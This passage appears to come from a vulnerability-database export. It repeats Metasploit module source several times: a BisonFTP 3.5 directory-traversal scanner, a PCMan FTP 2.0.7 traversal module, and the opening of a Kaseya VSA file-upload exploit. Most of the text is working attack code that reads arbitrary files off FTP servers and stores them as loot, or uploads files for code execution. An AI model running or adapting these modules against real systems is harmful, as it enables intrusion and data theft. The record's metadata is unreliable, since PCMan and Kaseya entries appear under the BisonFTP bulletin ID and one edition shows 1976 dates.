"reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-05-29T06:29:45", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-05-29T06:29:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-29T06:29:45", "differentElements": ["cvss"], "edition": 52}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-05-29T14:23:44", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-05-29T06:29:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-29T14:23:44", "differentElements": ["cvelist", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 53}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "30e61a80bd64e31683a2cb002769a675", "type": "metasploit", "bulletinFamily": "exploit", "title": "PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as '..//'\n", "published": "2015-11-08T05:08:23", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7601"], "cvelist": ["CVE-2015-7601"], "lastseen": "2019-06-08T16:26:27", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-05-29T06:29:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7.\n This vulnerability allows an attacker to download arbitrary files from the server by crafting\n a RETR command that includes file system traversal strings such as '..//'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts', # initial discovery\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38340'],\n [ 'CVE', '2015-7601']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n end\n\n def check_host(ip)\n begin\n connect\n if /220 PCMan's FTP Server 2\\.0/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n # Login anonymously and open the socket that we'll use for data retrieval.\n connect_login\n sock = data_connect\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file_path} not found\")\n return\n end\n\n if response_data.length == 0 or ! (res =~ /^150/ )\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"pcman.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-08T16:26:27", "differentElements": ["cvelist", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 54}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-06-08T18:34:02", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-08T18:34:02"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-06-08T18:34:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-08T18:34:02", "differentElements": ["modified", "published"], "edition": 55}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "4a45d8a912178abfeaf285407e747950", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-06-18T02:24:09", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-08T18:34:02"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-06-08T18:34:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-18T02:24:09", "differentElements": ["modified", "published"], "edition": 56}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-06-18T04:31:49", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-18T04:31:49"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-06-18T04:31:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-18T04:31:49", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 57}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "fa3f39c9cedc241aff107efdef3c78fc", "type": "metasploit", "bulletinFamily": "exploit", "title": "Kaseya VSA uploader.aspx Arbitrary File Upload", "description": "This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary directory leading to arbitrary code execution with IUSR privileges. This module has been tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.\n", "published": "2015-09-29T10:56:34", "modified": "2018-09-15T23:54:45", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6922", "https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt", "https://seclists.org/bugtraq/2015/Sep/132"], "cvelist": ["CVE-2015-6922"], "lastseen": "2019-06-21T00:25:33", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-18T04:31:49"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-06-18T04:31:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/kaseya_uploader.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Kaseya VSA uploader.aspx Arbitrary File Upload',\n 'Description' => %q{\n This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions\n between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary\n directory leading to arbitrary code execution with IUSR privileges. This module has been\n tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-6922'],\n ['ZDI', '15-449'],\n ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt'],\n ['URL', 'https://seclists.org/bugtraq/2015/Sep/132']\n ],\n 'Platform' => 'win',\n 'Arch' => 